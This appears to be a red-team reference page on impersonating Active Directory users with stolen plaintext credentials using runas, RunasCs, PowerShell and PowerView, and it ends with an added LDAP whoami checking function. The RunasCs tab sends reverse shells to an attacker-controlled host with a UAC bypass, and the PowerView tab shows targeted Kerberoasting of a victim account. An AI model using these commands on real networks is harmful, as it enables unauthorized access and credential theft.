# Impersonation

In Windows and Active Directory environments, once credentials have been obtained (through [dumping](https://red.infiltr8.io/redteam/credentials/broken-reference) or [cracking](https://red.infiltr8.io/ad/movement/credentials/cracking) for instance), attackers use them to gain access to new resources. Depending on the type of credential material harvested, the impersonation can be done in different ways.

* **LM or NT password hash**: [pass-the-hash](https://red.infiltr8.io/redteam/credentials/broken-reference)
* **RC4 Kerberos key (i.e. NT hash)**: [overpass-the-hash](https://red.infiltr8.io/ad/movement/kerberos/ptk)
* **non-RC4 Kerberos key (i.e. DES or AES)**: [pass-the-key](https://red.infiltr8.io/ad/movement/kerberos/ptk) (alias for overpass-the-hash)
* **Kerberos ticket**: [pass-the-ticket](https://red.infiltr8.io/redteam/credentials/broken-reference)
* **plaintext password**: the techniques listed below

{% tabs %}
{% tab title="RunAs" %}
RunAs is a standard Windows command that executes a program under a different user account. When supplying an Active Directory account's password, the `/netonly` flag must be set to indicate that the credentials are only to be used for remote access (network authentication): the spawned process itself keeps running under the current local identity, which is why `whoami` in that shell still shows the original user.

```bash
runas /netonly /user:$DOMAIN\$USER "powershell.exe"
```

Since the password cannot be supplied as an argument, runas prompts for it and the session must therefore be interactive. Note that with `/netonly` the password is not verified when the process is spawned: a wrong password still produces a shell, and the error only surfaces when the first remote authentication is attempted.
{% endtab %}

{% tab title="RunAsCs" %}
[RunasCs](https://github.com/antonioCoco/RunasCs) is a C# reimplementation of RunAs that takes the password on the command line. It is handy in non-interactive contexts (a web shell or reverse shell, for instance) where runas.exe's password prompt cannot be answered. Its `-l 9` option (logon type 9, NewCredentials) gives the same behaviour as `runas /netonly`.

```powershell
# Run a command locally as the given domain user
RunasCs.exe $USERNAME $PASSWORD $COMMAND -d $DOMAIN

# Run cmd.exe, send a reverse shell to the attacking host and bypass UAC
RunasCs.exe $USERNAME $PASSWORD cmd.exe -d $DOMAIN -r $ATTACKING_IP:$PORT --bypass-uac
```

Alternatively, the PowerShell version can be used:

```powershell
# Run a command as the given domain user and send a reverse shell to the attacking host
. .\Invoke-RunasCs.ps1
Invoke-RunasCs -Username $USERNAME -Password $PASSWORD -Domain $DOMAIN -Command $COMMAND -Remote $ATTACKING_IP:$PORT
```

{% endtab %}

{% tab title="Powershell" %}
In PowerShell, a user can be impersonated by creating a credential object and passing it to the `-Credential` parameter of the next command. Unlike `runas /netonly`, `Start-Process -Credential` performs an actual logon with the supplied password, so a wrong password fails immediately.

```powershell
# Credential object creation (prompted)
$credential = Get-Credential

# Credential object creation (not prompted)
$password = ConvertTo-SecureString 'password_of_user_to_run_as' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)

# Usage
Start-Process Notepad.exe -Credential $credential
```

{% endtab %}

{% tab title="PowerView" %}
Most of [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)'s functions accept the `-Credential`, `-Domain` and `-Server` parameters, which explicitly specify the user to run as, the target domain and the target Domain Controller. As in the previous "Powershell" tab, `-Credential` takes a credential object.

Here is an example for [targeted Kerberoasting](https://red.infiltr8.io/ad/movement/dacl/targeted-kerberoasting).

```powershell
# Credential object creation (not prompted)
$password = ConvertTo-SecureString 'password_of_user_to_run_as' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)

# Usage: add a fake SPN to the victim, then request its service ticket and dump it for cracking
Set-DomainObject -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' -Identity 'victimuser' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
$User = Get-DomainUser -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' -Identity 'victimuser'
$User | Get-DomainSPNTicket -Credential $Cred | fl
```

{% endtab %}
{% endtabs %}

[SharpLdapWhoami](https://github.com/bugch3ck/SharpLdapWhoami) can then be used to make sure the user is correctly impersonated. A standard `whoami` command only returns the identity of the local logon session, not the one used for remote operations (such as LDAP queries to the DC) when credentials were supplied with `/netonly`.

```powershell
.\SharpLdapWhoami.exe
.\SharpLdapWhoami.exe /method:kerberos /all
```
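The same check can be done without dropping a binary, using the LDAP "Who Am I?" extended operation (OID 1.3.6.1.4.1.4203.1.11.3, RFC 4532) that SharpLdapWhoami relies on. The function below is an added example, not code from the page or from the SharpLdapWhoami project: called without `-Credential` from inside a `runas /netonly` shell it reports the identity the DC actually sees next to the local one; called with `-Credential` it binds explicitly with the plaintext password, which also validates it (a wrong password throws an `LdapException` at bind time, the check that `runas /netonly` never performs). The DC name `dc01.domain.local` and the account in the usage lines are placeholders.

```powershell
# Added example: LDAP WhoAmI from PowerShell (System.DirectoryServices.Protocols,
# available on Windows PowerShell and PowerShell 7 on Windows).
Add-Type -AssemblyName System.DirectoryServices.Protocols

function Get-LdapWhoAmI {
    param(
        [Parameter(Mandatory)] [string] $Server,                      # DC hostname (FQDN preferred for Kerberos)
        [System.Management.Automation.PSCredential] $Credential,      # optional: explicit bind instead of current context
        [ValidateSet('Negotiate', 'Kerberos', 'Ntlm')] [string] $AuthType = 'Negotiate',
        [switch] $UseSsl                                              # LDAPS on 636 instead of signed/sealed LDAP on 389
    )

    $port = if ($UseSsl) { 636 } else { 389 }
    $id   = New-Object System.DirectoryServices.Protocols.LdapDirectoryIdentifier($Server, $port)
    $conn = New-Object System.DirectoryServices.Protocols.LdapConnection($id)
    $conn.SessionOptions.ProtocolVersion = 3
    if ($UseSsl) {
        $conn.SessionOptions.SecureSocketLayer = $true
    } else {
        # Sign and seal the SASL session so DCs enforcing LDAP signing accept the bind
        $conn.SessionOptions.Signing = $true
        $conn.SessionOptions.Sealing = $true
    }
    $conn.AuthType = [System.DirectoryServices.Protocols.AuthType]$AuthType

    if ($Credential) {
        # Explicit credentials: the bind below fails with result code 49 on a wrong password
        $conn.Credential = $Credential.GetNetworkCredential()
    }
    # Without -Credential the bind uses the process' network identity, i.e. the
    # account stuffed with runas /netonly (or RunasCs -l 9), not the local logon session
    $conn.Bind()

    try {
        $req  = New-Object System.DirectoryServices.Protocols.ExtendedRequest('1.3.6.1.4.1.4203.1.11.3')
        $resp = [System.DirectoryServices.Protocols.ExtendedResponse] $conn.SendRequest($req)
        # AD answers with an authzId such as "u:DOMAIN\user"; an anonymous bind yields an empty value
        $authzId = if ($resp.ResponseValue) {
            [System.Text.Encoding]::UTF8.GetString($resp.ResponseValue)
        } else {
            '<anonymous>'
        }
    } finally {
        $conn.Dispose()
    }

    [pscustomobject]@{
        LocalUser = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
        LdapUser  = $authzId
    }
}

# Usage (placeholder DC and account):
# 1) inside a "runas /netonly" shell: LocalUser stays the original account, LdapUser shows the domain account
Get-LdapWhoAmI -Server 'dc01.domain.local'

# 2) explicit bind with a plaintext password, which validates it before it is used anywhere else
$password   = ConvertTo-SecureString 'password_of_user_to_run_as' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('DOMAIN\user_to_run_as', $password)
Get-LdapWhoAmI -Server 'dc01.domain.local' -Credential $credential -AuthType Kerberos
```

`-AuthType Kerberos` forces a Kerberos bind so the test mirrors `SharpLdapWhoami.exe /method:kerberos`; leave the default `Negotiate` to let SSPI pick, or use `Ntlm` to confirm that the NT hash path works when Kerberos is unavailable.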
